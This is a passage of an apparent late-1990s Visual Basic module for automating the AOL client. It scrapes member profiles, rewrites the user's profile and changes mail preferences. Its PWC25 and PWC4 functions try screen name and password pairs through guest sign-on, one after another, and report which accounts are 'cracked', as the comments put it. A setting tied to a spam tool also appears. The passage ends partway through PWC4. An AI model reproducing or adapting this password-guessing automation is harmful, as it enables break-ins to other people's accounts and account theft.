  6656. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  6657. Call SetMailPrefs25
  6658. Exit Sub
  6659. End If
  6660.  
  6661. End Sub
  6662.  
  6663. Public Sub SetMailPrefs25()
  6664. Dim aol As Long, mdi As Long, pWin As Long, pButton As Long
  6665. Dim mWin As Long, mCheck1 As Long, mCheck2 As Long, mBut As Long
  6666.  
  6667. aol& = FindWindow("AOL Frame25", vbNullString)
  6668. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6669.  
  6670. Call OpenPrefs
  6671.  
  6672. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  6673. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  6674. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6675. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6676. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6677. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6678. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6679.  
  6680. Call SendMessage(pButton&, WM_LBUTTONDOWN, 0&, 0&)
  6681. Call SendMessage(pButton&, WM_LBUTTONUP, 0&, 0&)
  6682.  
  6683. Do
  6684. DoEvents
  6685. mWin& = FindWindow("_AOL_Modal", "Mail Preferences")
  6686. mCheck1& = FindWindowEx(mWin&, 0&, "_AOL_Button", "Confirm mail after it has been sent")
  6687. mCheck2& = FindWindowEx(mWin&, mCheck2&, "_AOL_Button", "Close mail after it has been sent")
  6688. mBut& = FindWindowEx(mWin&, 0&, "_AOL_Button", "OK")
  6689. Loop Until mWin& <> 0& And mCheck1& <> 0& And mCheck2& <> 0& And mBut& <> 0&
  6690.  
  6691. Do
  6692. DoEvents
  6693. Call PostMessage(mCheck1&, WM_KEYDOWN, VK_SPACE, 0&)
  6694. Call PostMessage(mCheck1&, WM_KEYUP, VK_SPACE, 0&)
  6695. Loop Until SendMessage(mCheck1&, BM_GETCHECK, 0&, 0&) = 1
  6696.  
  6697. Do
  6698. DoEvents
  6699. Call PostMessage(mCheck2&, WM_KEYDOWN, VK_SPACE, 0&)
  6700. Call PostMessage(mCheck2&, WM_KEYUP, VK_SPACE, 0&)
  6701. Loop Until SendMessage(mCheck2&, BM_GETCHECK, 0&, 0&) = 0
  6702.  
  6703. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6704. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  6705.  
  6706. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  6707. End Sub
  6708.  
  6709. Public Sub pause(length As Double)
  6710. 'that's right, this is the real pause.
  6711. 'almost every other .bas has "Length as LONG"
  6712. 'which means that all those times you put:
  6713. '"Pause (0.6)" or "Pause(1.5)" it wasn't pausing for
  6714. 'that amount of time..
  6715.  
  6716. 'Long does not allow decimals, so:
  6717. ' .5 would = 0
  6718. ' .6 would = 1
  6719. 'and so on..
  6720.  
  6721. 'but the variable type "Double" allows decimals..
  6722. 'so feel confident now that you're using pause (0.6)
  6723.  
  6724. Dim StartTime
  6725.  
  6726. StartTime = Timer
  6727.  
  6728. Do While Timer - StartTime < length 'and (Timer - StartTime) > 0
  6729. DoEvents
  6730. Loop
  6731. End Sub
  6732.  
  6733. Public Sub Pause2(length As Double)
  6734. 'sub made for 'overhead' mode
  6735. Dim StartTime, mode As String
  6736.  
  6737. mode$ = GetFromINI("ph2", "mode", App.Path + "\ph2.ini")
  6738. If mode$ = "overhead" Then Exit Sub
  6739.  
  6740. StartTime = Timer
  6741.  
  6742. Do While Timer - StartTime < length
  6743. DoEvents
  6744. Loop
  6745. End Sub
  6746.  
  6747. Public Sub Playwav(wav As String)
  6748. 'self explanatory
  6749. If FileExists(wav$) = True Then
  6750. Call sndPlaySound(wav$, 0&, SND_FLAG)
  6751. End If
  6752. End Sub
  6753. Public Sub FormExitLeft(TheForm As Form)
  6754. Do
  6755. DoEvents
  6756. TheForm.Left = Trim(Str(Int(TheForm.Left) - 300))
  6757. Loop Until TheForm.Left < -TheForm.Width
  6758. End Sub
  6759.  
  6760. Public Function profile(screenname As String) As String
  6761. 'function that returns a screen name's profile.
  6762.  
  6763. Dim aol As Long, mdi As Long
  6764. Dim gWin As Long, gEdit As Long, gIcon As Long
  6765. Dim pWin As Long, pCNTL As Long, pString As String
  6766. Dim mWin As Long, mBut As Long
  6767.  
  6768. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  6769. profile$ = Profile25(screenname$)
  6770. Exit Function
  6771. End If
  6772. aol& = FindWindow("AOL Frame25", vbNullString)
  6773. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6774.  
  6775. Call RunTBMenu(10&, 11&)
  6776.  
  6777. Do
  6778. DoEvents
  6779. gWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Get a Member's Profile")
  6780. gEdit& = FindWindowEx(gWin&, 0&, "_AOL_Edit", vbNullString)
  6781. gIcon& = FindWindowEx(gWin&, 0&, "_AOL_Icon", vbNullString)
  6782. Loop Until gWin& <> 0& And gEdit& <> 0& And gIcon& <> 0&
  6783.  
  6784. Call SendMessageByString(gEdit&, WM_SETTEXT, 0&, screenname$)
  6785.  
  6786. Call SendMessage(gIcon&, WM_LBUTTONDOWN, 0&, 0&)
  6787. Call SendMessage(gIcon&, WM_LBUTTONUP, 0&, 0&)
  6788.  
  6789. Do
  6790. DoEvents
  6791. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Profile")
  6792. pCNTL& = FindWindowEx(pWin&, 0&, "RICHCNTL", vbNullString)
  6793.  
  6794. mWin& = FindWindow("#32770", "America Online")
  6795. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  6796. Loop Until pWin& <> 0& And pCNTL& <> 0& Or mWin& <> 0& And mBut& <> 0&
  6797.  
  6798. If pWin& <> 0& Then
  6799. pause (0.5)
  6800. pString$ = GetText(pCNTL&)
  6801. profile = pString$
  6802. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  6803. ElseIf mWin& <> 0& Then
  6804. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6805. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  6806. profile$ = ""
  6807. End If
  6808.  
  6809. Call PostMessage(gWin&, WM_CLOSE, 0&, 0&)
  6810. End Function
  6811.  
  6812. Public Function Profile25(screenname As String) As String
  6813. 'function that returns the screen name's profile.
  6814. Dim aol As Long, mdi As Long
  6815. Dim gWin As Long, gEdit As Long, gButton As Long
  6816. Dim pWin As Long, pView As Long, pString As String
  6817. Dim mWin As Long, mBut As Long
  6818.  
  6819. aol& = FindWindow("AOL Frame25", vbNullString)
  6820. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6821.  
  6822. Call RunMenuByString("get a member's profile")
  6823.  
  6824. Do
  6825. DoEvents
  6826. gWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Get a Member's Profile")
  6827. gEdit& = FindWindowEx(gWin&, 0&, "_AOL_Edit", vbNullString)
  6828. gButton& = FindWindowEx(gWin&, 0&, "_AOL_Button", "OK")
  6829. Loop Until gWin& <> 0& And gEdit& <> 0& And gButton& <> 0&
  6830.  
  6831. Call SendMessageByString(gEdit&, WM_SETTEXT, 0&, screenname$)
  6832.  
  6833. Call SendMessage(gButton&, WM_KEYDOWN, VK_SPACE, 0&)
  6834. Call SendMessage(gButton&, WM_KEYUP, VK_SPACE, 0&)
  6835.  
  6836. Do
  6837. DoEvents
  6838. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Profile")
  6839. If AOLVersion = "2.5" Then
  6840. pView& = FindWindowEx(pWin&, 0&, "_AOL_View", vbNullString)
  6841. Else
  6842. pView& = FindWindowEx(pWin&, 0&, "RICHCNTL", vbNullString)
  6843. End If
  6844.  
  6845. mWin& = FindWindow("#32770", "America Online")
  6846. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  6847. Loop Until pWin& <> 0& And pView& <> 0& Or mWin& <> 0& And mBut& <> 0&
  6848.  
  6849. If pWin& <> 0& Then
  6850. pause (0.5)
  6851. pString$ = GetText(pView&)
  6852. Profile25$ = pString$
  6853. Call PostMessage(pWin&, WM_CLOSE, 0&, 0&)
  6854. ElseIf mWin& <> 0& Then
  6855. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6856. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  6857. Profile25$ = ""
  6858. End If
  6859. End Function
  6860.  
  6861. Public Sub ProfileTagger(Line1 As String, Line2 As String, Line3 As String, line4 As String, line5 As String, Line6 As String, Line7 As String, Line8 As String)
  6862. 'tags user's profile
  6863. Dim aol As Long, mdi As Long, mNum As Long
  6864. Dim tagWindow As Long, tagEdit1 As Long, tagEdit2 As Long, tagEdit3 As Long, tagEdit4 As Long, tagEdit5 As Long, tagEdit6 As Long, tagEdit7 As Long, tagEdit8 As Long, tagButton As Long, tagCheck As Long
  6865. Dim tagMWin As Long, tagMCheck As Long, tagMBut As Long
  6866. Dim tagMsg As Long, tagMsgBut As Long
  6867.  
  6868. mNum& = ModalKill
  6869.  
  6870. If AOLVersion = "2.5" Or AOLVersion = "3" Then
  6871. Call ProfileTagger25(Line1$, Line2$, Line3$, line4$, line5$, Line6$, Line7$, Line8$)
  6872. Exit Sub
  6873. End If
  6874. aol& = FindWindow("AOL Frame25", vbNullString)
  6875. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6876.  
  6877. Call RunTBMenu(6&, 4&)
  6878.  
  6879. Do
  6880. DoEvents
  6881. tagWindow& = FindWindowEx(mdi&, 0&, "AOL Child", "Edit Your Online Profile")
  6882. tagEdit1& = FindWindowEx(tagWindow&, 0&, "_AOL_Edit", vbNullString)
  6883. tagEdit2& = FindWindowEx(tagWindow&, tagEdit1, "_AOL_Edit", vbNullString)
  6884. tagEdit3& = FindWindowEx(tagWindow&, tagEdit2, "_AOL_Edit", vbNullString)
  6885. tagEdit4& = FindWindowEx(tagWindow&, tagEdit3, "_AOL_Edit", vbNullString)
  6886. tagEdit5& = FindWindowEx(tagWindow&, tagEdit4, "_AOL_Edit", vbNullString)
  6887. tagEdit6& = FindWindowEx(tagWindow&, tagEdit5, "_AOL_Edit", vbNullString)
  6888. tagEdit7& = FindWindowEx(tagWindow&, tagEdit6, "_AOL_Edit", vbNullString)
  6889. tagEdit8& = FindWindowEx(tagWindow&, tagEdit7, "_AOL_Edit", vbNullString)
  6890. tagButton& = FindWindowEx(tagWindow&, 0&, "_AOL_Icon", vbNullString)
  6891. tagButton& = FindWindowEx(tagWindow&, tagButton&, "_AOL_Icon", vbNullString)
  6892. tagCheck& = FindWindowEx(tagWindow&, 0&, "_AOL_Checkbox", vbNullString)
  6893. tagCheck& = FindWindowEx(tagWindow&, tagCheck&, "_AOL_Checkbox", vbNullString)
  6894. tagCheck& = FindWindowEx(tagWindow&, tagCheck&, "_AOL_Checkbox", vbNullString)
  6895. Loop Until tagWindow& <> 0& And tagEdit1& <> 0& And tagEdit2& <> 0& And tagEdit3& <> 0& And tagEdit4& <> 0& And tagEdit5& <> 0& And tagEdit6& <> 0& And tagEdit7& <> 0& And tagEdit8& <> 0& And tagButton& <> 0&
  6896.  
  6897. 'Pause (1)
  6898. '
  6899. 'tagMWin& = FindWindow("_AOL_Modal", vbNullString)
  6900. 'tagMCheck& = FindWindowEx(tagMWin&, 0&, "_AOL_Checkbox", vbNullString)
  6901. 'tagMBut& = FindWindowEx(tagMWin&, 0&, "_AOL_Icon", vbNullString)
  6902. '
  6903. 'If tagMWin& <> 0& Then
  6904. ' Call SendMessage(tagMCheck&, WM_LBUTTONDOWN, 0&, 0&)
  6905. ' Call SendMessage(tagMCheck&, WM_LBUTTONUP, 0&, 0&)
  6906. '
  6907. ' Call SendMessage(tagMBut&, WM_LBUTTONDOWN, 0&, 0&)
  6908. ' Call SendMessage(tagMBut&, WM_LBUTTONUP, 0&, 0&)
  6909. ' Pause (0.6)
  6910. 'End If
  6911.  
  6912. Call SendMessageByString(tagEdit1&, WM_SETTEXT, 0&, Line1)
  6913. Call SendMessageByString(tagEdit2&, WM_SETTEXT, 0&, Line2)
  6914. Call SendMessageByString(tagEdit3&, WM_SETTEXT, 0&, Line3)
  6915. Call SendMessageByString(tagEdit4&, WM_SETTEXT, 0&, line4)
  6916. Call SendMessageByString(tagEdit5&, WM_SETTEXT, 0&, line5)
  6917. Call SendMessageByString(tagEdit6&, WM_SETTEXT, 0&, Line6)
  6918. Call SendMessageByString(tagEdit7&, WM_SETTEXT, 0&, Line7)
  6919. Call SendMessageByString(tagEdit8&, WM_SETTEXT, 0&, Line8)
  6920.  
  6921. pause (0.5)
  6922.  
  6923. Call SendMessage(tagCheck&, WM_LBUTTONDOWN, 0&, 0&)
  6924. Call SendMessage(tagCheck&, WM_LBUTTONUP, 0&, 0&)
  6925.  
  6926. Call SendMessage(tagButton&, WM_LBUTTONDOWN, 0&, 0&)
  6927. Call SendMessage(tagButton&, WM_LBUTTONUP, 0&, 0&)
  6928.  
  6929. Call PostMessage(tagButton&, WM_KEYDOWN, VK_SPACE, 0&)
  6930. Call PostMessage(tagButton&, WM_KEYUP, VK_SPACE, 0&)
  6931.  
  6932. Do
  6933. DoEvents
  6934. tagMsg& = FindWindow("#32770", "America Online")
  6935. tagMsgBut& = FindWindowEx(tagMsg&, 0&, "Button", "OK")
  6936. Loop Until tagMsg& <> 0& And tagMsgBut& <> 0&
  6937.  
  6938. Call SendMessage(tagMsgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6939. Call SendMessage(tagMsgBut&, WM_KEYUP, VK_SPACE, 0&)
  6940.  
  6941. Call ModalKill
  6942. End Sub
  6943.  
  6944. Public Sub ProfileTagger25(Line1 As String, Line2 As String, Line3 As String, line4 As String, line5 As String, Line6 As String, Line7 As String, Line8 As String)
  6945. 'tags user's profile
  6946. Dim aol As Long, mdi As Long, mdWin As Long, mdIcon As Long
  6947. Dim pWin As Long, pEdit1 As Long, pEdit2 As Long, pEdit3 As Long
  6948. Dim pEdit4 As Long, pEdit5 As Long, pEdit6 As Long, pEdit7 As Long
  6949. Dim pEdit8 As Long, pIcon As Long, msgWin As Long, msgBut As Long
  6950. Dim mdList As Long, StartTime As Double
  6951.  
  6952. aol& = FindWindow("AOL Frame25", vbNullString)
  6953. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6954.  
  6955.  
  6956. mdWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  6957.  
  6958. If mdWin& = 0& Then
  6959. Call Keyword("member directory")
  6960. End If
  6961.  
  6962. If AOLVersion = "2.5" Then
  6963. Do
  6964. DoEvents
  6965. mdWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  6966. mdList& = FindWindowEx(mdWin&, 0&, "_AOL_Listbox", vbNullString)
  6967. Loop Until mdWin& <> 0& And mdList& <> 0&
  6968.  
  6969. pause (0.1)
  6970.  
  6971. Call SendMessage(mdList&, LB_SETCURSEL, 3&, 0&)
  6972. Call SendMessageLong(mdList&, WM_CHAR, ENTER_KEY, 0&)
  6973. Else
  6974. Do
  6975. DoEvents
  6976. mdWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  6977. mdIcon& = FindWindowEx(mdWin&, 0&, "_AOL_Icon", vbNullString)
  6978. Loop Until mdWin& <> 0& And mdIcon& <> 0&
  6979.  
  6980. Do
  6981. DoEvents
  6982. Call SendMessage(mdIcon&, WM_LBUTTONDOWN, 0&, 0&)
  6983. Call SendMessage(mdIcon&, WM_LBUTTONUP, 0&, 0&)
  6984. StartTime = Timer
  6985.  
  6986. Do While Timer - StartTime < 1 And pWin& = 0&
  6987. DoEvents
  6988. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Edit Your Online Profile")
  6989. Loop
  6990. Loop Until pWin& <> 0&
  6991. End If
  6992.  
  6993. Do
  6994. DoEvents
  6995. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Edit Your Online Profile")
  6996. pEdit1& = FindWindowEx(pWin&, 0&, "_AOL_Edit", vbNullString)
  6997. pEdit2& = FindWindowEx(pWin&, pEdit1&, "_AOL_Edit", vbNullString)
  6998. pEdit3& = FindWindowEx(pWin&, pEdit2&, "_AOL_Edit", vbNullString)
  6999. pEdit4& = FindWindowEx(pWin&, pEdit3&, "_AOL_Edit", vbNullString)
  7000. pEdit5& = FindWindowEx(pWin&, pEdit4&, "_AOL_Edit", vbNullString)
  7001. pEdit6& = FindWindowEx(pWin&, pEdit5&, "_AOL_Edit", vbNullString)
  7002. pEdit7& = FindWindowEx(pWin&, pEdit6&, "_AOL_Edit", vbNullString)
  7003. pEdit8& = FindWindowEx(pWin&, pEdit7&, "_AOL_Edit", vbNullString)
  7004. pIcon& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  7005. If AOLVersion = "3" Then
  7006. pIcon& = FindWindowEx(pWin&, pIcon&, "_AOL_Icon", vbNullString)
  7007. End If
  7008. Loop Until pWin& <> 0& And pEdit8& <> 0& And pIcon& <> 0&
  7009.  
  7010. Call SendMessageByString(pEdit1&, WM_SETTEXT, 0&, Line1$)
  7011. Call SendMessageByString(pEdit2&, WM_SETTEXT, 0&, Line2$)
  7012. Call SendMessageByString(pEdit3&, WM_SETTEXT, 0&, Line3$)
  7013. Call SendMessageByString(pEdit4&, WM_SETTEXT, 0&, line4$)
  7014. Call SendMessageByString(pEdit5&, WM_SETTEXT, 0&, line5$)
  7015. Call SendMessageByString(pEdit6&, WM_SETTEXT, 0&, Line6$)
  7016. Call SendMessageByString(pEdit7&, WM_SETTEXT, 0&, Line7$)
  7017. Call SendMessageByString(pEdit8&, WM_SETTEXT, 0&, Line8$)
  7018.  
  7019. Call SendMessage(pIcon&, WM_LBUTTONDOWN, 0&, 0&)
  7020. Call SendMessage(pIcon&, WM_LBUTTONUP, 0&, 0&)
  7021.  
  7022. Do
  7023. DoEvents
  7024. msgWin& = FindWindow("#32770", "America Online")
  7025. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  7026. Loop Until msgWin& <> 0& And msgBut& <> 0&
  7027.  
  7028. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  7029. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  7030.  
  7031. Call PostMessage(mdWin&, WM_CLOSE, 0&, 0&)
  7032.  
  7033. End Sub
  7034.  
  7035. Public Function PWC25(screenname As String, Password As String) As Boolean
  7036. 'elite / fast guest signon code for 2.5
  7037. 'it's made to be used back to back..
  7038. 'to use it:
  7039.  
  7040. 'if pwc25("kai", "iscool") = true then
  7041. ' msgbox "kai has been cracked!"
  7042. 'else
  7043. ' msgbox "wrong pw for kai"
  7044. 'end if
  7045. Dim aol As Long, mdi As Long, soWin As Long, soCombo As Long, soIcon As Long
  7046. Dim lngClick As Long, gWin As Long, gEditSN As Long, gEditPW As Long, gButton As Long
  7047. Dim soStatic As Long, soString As String, welWin As Long
  7048. Dim msgWin As Long, msgBut As Long, csWin As Long, csBut As Long, csStatic As Long, csString As String
  7049. Dim msgStatic As Long, MsgString As String, CheckForGB As Boolean
  7050.  
  7051. If FindGuestSignOn& <> 0& Then CheckForGB = True: GoTo EnterSNandPW
  7052.  
  7053. CheckForGB = False
  7054.  
  7055. If GetUser <> "" Then
  7056. Call SignOff25
  7057. End If
  7058.  
  7059. Do
  7060. DoEvents
  7061. soWin& = FindSignOnWindow
  7062. If AOLVersion = "2.5" Then
  7063. soStatic& = FindWindowEx(soWin&, 0&, "_AOL_Static", vbNullString)
  7064. soStatic& = FindWindowEx(soWin&, soStatic&, "_AOL_Static", vbNullString)
  7065. Else
  7066. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  7067. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  7068. End If
  7069. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  7070. soIcon& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  7071. If AOLVersion = "3" Then
  7072. soIcon& = FindWindowEx(soWin&, soIcon&, "_AOL_Icon", vbNullString)
  7073. soIcon& = FindWindowEx(soWin&, soIcon&, "_AOL_Icon", vbNullString)
  7074. End If
  7075. Loop Until soWin& <> 0& And soCombo& <> 0& And soIcon& <> 0&
  7076.  
  7077. pause (0.5)
  7078.  
  7079. Call SendMessage(soCombo&, CB_SETCURSEL, SendMessage(soCombo&, CB_GETCOUNT, 0&, 0&) - 2, 0&)
  7080.  
  7081. Call SendMessageByString(soStatic&, WM_SETTEXT, 0&, "")
  7082.  
  7083. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  7084.  
  7085. Call SendMessage(soIcon&, WM_LBUTTONDOWN, 0&, 0&)
  7086. Call SendMessage(soIcon&, WM_LBUTTONUP, 0&, 0&)
  7087.  
  7088. EnterSNandPW:
  7089.  
  7090. Do
  7091. DoEvents
  7092. gWin& = FindGuestSignOn
  7093. gEditSN& = FindWindowEx(gWin&, 0&, "_AOL_Edit", vbNullString)
  7094. gEditPW& = FindWindowEx(gWin&, gEditSN&, "_AOL_Edit", vbNullString)
  7095. gButton& = FindWindowEx(gWin&, 0&, "_AOL_Button", "OK")
  7096. Loop Until gWin& <> 0& And gEditPW& <> 0& And gButton& <> 0&
  7097.  
  7098. Call SendMessageByString(gEditSN&, WM_SETTEXT, 0&, screenname$)
  7099. Call SendMessageByString(gEditPW&, WM_SETTEXT, 0&, Password$)
  7100.  
  7101. Call PostMessage(gButton&, WM_KEYDOWN, VK_SPACE, 0&)
  7102. Call PostMessage(gButton&, WM_KEYUP, VK_SPACE, 0&)
  7103.  
  7104. Do
  7105. DoEvents
  7106. welWin& = FindWelcome&
  7107.  
  7108. msgWin& = FindWindow("#32770", "America Online")
  7109. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  7110.  
  7111. soWin& = FindSignOnWindow
  7112. If AOLVersion = "2.5" Then
  7113. soStatic& = FindWindowEx(soWin&, 0&, "_AOL_Static", vbNullString)
  7114. soStatic& = FindWindowEx(soWin&, soStatic&, "_AOL_Static", vbNullString)
  7115. Else
  7116. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  7117. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  7118. End If
  7119. soString$ = GetText(soStatic&)
  7120. Loop Until welWin& <> 0& Or msgWin& <> 0& And msgBut& <> 0& Or soWin& <> 0& And soStatic& <> 0& And soString$ <> ""
  7121.  
  7122. If welWin& <> 0& Then
  7123. PWC25 = True
  7124. Exit Function
  7125. End If
  7126.  
  7127. If msgWin& <> 0& And FindGuestSignOn <> 0& Then
  7128. Do
  7129. msgWin& = FindWindow("#32770", "America Online")
  7130. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  7131. msgStatic& = FindWindowEx(msgWin&, 0&, "Static", vbNullString)
  7132. msgStatic& = FindWindowEx(msgWin&, msgStatic&, "Static", vbNullString)
  7133. MsgString$ = GetText(msgStatic&)
  7134. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  7135. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  7136. Loop Until msgWin& <> 0&
  7137. pause (0.4)
  7138. PWC25 = False
  7139. Exit Function
  7140. End If
  7141.  
  7142. If soStatic& <> 0& Then
  7143. If InStr(1, soString$, "This account is not currently active") <> 0& Then
  7144. PWC25 = False
  7145. ElseIf InStr(1, soString$, "Invalid account") <> 0& Then
  7146. PWC25 = False
  7147. ElseIf InStr(1, soString$, "You have been disconnected from America Online") <> 0& Then
  7148. Do
  7149. DoEvents
  7150. csWin& = FindWindow("#32770", "America Online")
  7151. csBut& = FindWindowEx(csWin&, 0&, "Button", "OK")
  7152. csStatic& = FindWindowEx(csWin&, 0&, "Static", vbNullString)
  7153. csStatic& = FindWindowEx(csWin&, csStatic&, "Static", vbNullString)
  7154. csString$ = GetText(csStatic&)
  7155. Loop Until csWin& <> 0& And csBut& <> 0& And csStatic& <> 0& And csString$ <> ""
  7156.  
  7157. Call PostMessage(csBut&, WM_KEYDOWN, VK_SPACE, 0&)
  7158. Call PostMessage(csBut&, WM_KEYUP, VK_SPACE, 0&)
  7159.  
  7160. If InStr(1, csString$, "Your account is signed on using") <> 0& Then
  7161. PWC25 = True
  7162. ElseIf InStr(1, csString$, "This account has been suspended") <> 0& Then
  7163. PWC25 = False
  7164. End If
  7165. End If
  7166. End If
  7167.  
  7168. End Function
  7169.  
  7170. Public Function PWC4(screenname As String, Password As String) As Boolean
  7171. 'same as pwc25
  7172. Dim aol As Long, mdi As Long, soWin As Long, soCombo As Long, soIcon As Long
  7173. Dim lngClick As Long, gWin As Long, gEditSN As Long, gEditPW As Long, gButton As Long
  7174. Dim soStatic As Long, soString As String, welWin As Long, soEdit As Long
  7175. Dim msgWin As Long, msgBut As Long, csWin As Long, csBut As Long, csStatic As Long, csString As String
  7176. Dim msgStatic As Long, MsgString As String, soIconx As Long, gIcon As Long, soSignOn As Long
  7177. Dim conModal As Long, conIcon As Long
  7178. Dim StartTime
  7179.  
  7180. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  7181. PWC4 = PWC25(screenname$, Password$)
  7182. Exit Function
  7183. End If
  7184.  
  7185. If FindGuestSignOn& <> 0& Then GoTo EnterSNandPW
  7186.  
  7187. If GetUser <> "" Then
  7188. Call SignOff
  7189. End If
  7190.  
  7191. SignOnAgain:
  7192.  
  7193. Do
  7194. DoEvents
  7195. soWin& = FindSignOnWindow
  7196. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  7197. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  7198. soCombo& = FindWindowEx(soWin&, 0&, "_AOL_Combobox", vbNullString)
  7199. soEdit& = FindWindowEx(soWin&, 0&, "_AOL_Edit", vbNullString)
  7200. soIcon& = FindWindowEx(soWin&, 0&, "_AOL_Icon", vbNullString)
  7201. soIcon& = FindWindowEx(soWin&, soIcon&, "_AOL_Icon", vbNullString)
  7202. soIcon& = FindWindowEx(soWin&, soIcon&, "_AOL_Icon", vbNullString)
  7203. soIconx& = FindWindowEx(soWin&, soIcon&, "_AOL_Icon", vbNullString)
  7204. If soIconx& <> 0& Then soIcon& = soIconx&
  7205. Loop Until soWin& <> 0& And soCombo& <> 0& And soIcon& <> 0&
  7206.  
  7207. pause (GetFromINI("spamage", "signoff pause", App.Path + "\spamage.ini"))
  7208.  
  7209. Call SendMessage(soCombo&, CB_SETCURSEL, SendMessage(soCombo&, CB_GETCOUNT, 0&, 0&) - 1, 0&)
  7210.  
  7211. Call SendMessageByString(soStatic&, WM_SETTEXT, 0&, "")
  7212. Call SendMessageByString(soEdit&, WM_SETTEXT, 0&, "password")
  7213.  
  7214. Call SendMessageLong(soCombo&, WM_CHAR, ENTER_KEY, 0&)
  7215.  
  7216. EnterSNandPW:
  7217.  
  7218. Do
  7219. DoEvents
  7220. StartTime = Timer
  7221.  
  7222. Do While Timer - StartTime < 30
  7223. DoEvents
  7224. gWin& = FindGuestSignOn
  7225. gEditSN& = FindWindowEx(gWin&, 0&, "_AOL_Edit", vbNullString)
  7226. gEditPW& = FindWindowEx(gWin&, gEditSN&, "_AOL_Edit", vbNullString)
  7227. gIcon& = FindWindowEx(gWin&, 0&, "_AOL_Icon", vbNullString)
  7228. If gWin& <> 0& And gEditSN& <> 0& And gEditPW& <> 0& And gIcon& <> 0& Then GoTo FoundWindow
  7229. Loop
  7230.  
  7231. conModal& = FindWindow("_AOL_Modal", "")
  7232. conIcon& = FindWindowEx(conModal&, 0&, "_AOL_Icon", vbNullString)
  7233.  
  7234. Call SendMessage(conIcon&, WM_LBUTTONDOWN, 0&, 0&)
  7235. Call SendMessage(conIcon&, WM_LBUTTONUP, 0&, 0&)
  7236.  
  7237. Do
  7238. DoEvents
  7239. Loop Until FindSignOnWindow <> 0&
  7240.  
  7241. Call ModalKill
  7242.  
  7243. GoTo SignOnAgain
  7244.  
  7245. Loop Until gWin& <> 0& And gEditPW& <> 0& And gIcon& <> 0&
  7246.  
  7247. FoundWindow:
  7248.  
  7249. Call SendMessageByString(gEditSN&, WM_SETTEXT, 0&, screenname$)
  7250. Call SendMessageByString(gEditPW&, WM_SETTEXT, 0&, Password$)
  7251.  
  7252. Call SendMessageLong(gEditPW&, WM_CHAR, ENTER_KEY, 0&)
  7253.  
  7254. Do
  7255. DoEvents
  7256. aol& = FindWindow("AOL Frame25", vbNullString)
  7257. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  7258. welWin& = FindWelcome&
  7259.  
  7260. msgWin& = FindWindow("#32770", "America Online")
  7261. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  7262.  
  7263. soWin& = FindSignOnWindow
  7264. soStatic& = FindWindowEx(soWin&, 0&, "RICHCNTL", vbNullString)
  7265. soStatic& = FindWindowEx(soWin&, soStatic&, "RICHCNTL", vbNullString)
  7266. soString$ = GetText(soStatic&)
  7267. Loop Until welWin& <> 0& Or msgWin& <> 0& And msgBut& <> 0& Or soWin& <> 0& And soStatic& <> 0& And soString$ <> "" Or soSignOn& <> 0&
  7268.  
  7269. If welWin& <> 0& Then
  7270. PWC4 = True
  7271. Exit Function
  7272. End If
  7273.  
  7274. If msgWin& <> 0& And FindGuestSignOn <> 0& Then
  7275. Do
  7276. DoEvents
